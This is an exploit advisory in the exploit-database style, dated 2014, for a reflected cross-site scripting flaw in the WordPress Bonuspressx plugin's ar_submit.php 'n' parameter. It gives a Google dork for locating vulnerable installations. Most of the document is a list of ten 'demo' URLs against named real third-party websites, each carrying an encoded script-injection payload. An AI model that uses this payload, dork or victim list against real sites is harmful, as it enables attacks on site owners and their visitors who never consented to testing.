WordPress Bonuspressx plugin suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
aec03fc2e227a6dea33b5812588e9d3f7551e471c19b7c4c05936f9911f8ca9e
############################################
[+] Exploit Title : Wordpress Bonuspressx Plugin Cross Site Scripting
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://wordpress.org
[+] Google Dork : inurl:/wp-content/plugins/bonuspressx
[+] Date : 2014-04-23
[+] Tested on : Windows 7 , Mozilla FireFox
############################################
[+] Exploit : Cross Site Scripting
[+] Location :
[Target]/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=[XSS]
############################################
[+] Demo :
#
http://megabon.us/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://dsimple.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://cachkiemtienonline.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://markcall.com/bonus/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://onlinekarrier.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://imhoangtram.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://imakingmoney.net/blog/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://senukeinferno.com//wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://emarky.net/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://viraloptins.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
############################################
Discovered By : Milad Hacking & Cyber Injector
We Love Mohammad
Mail : milad.hacking.blackhat@gmail.com
Home Page : https://www.facebook.com/milad.hacking.5
############################################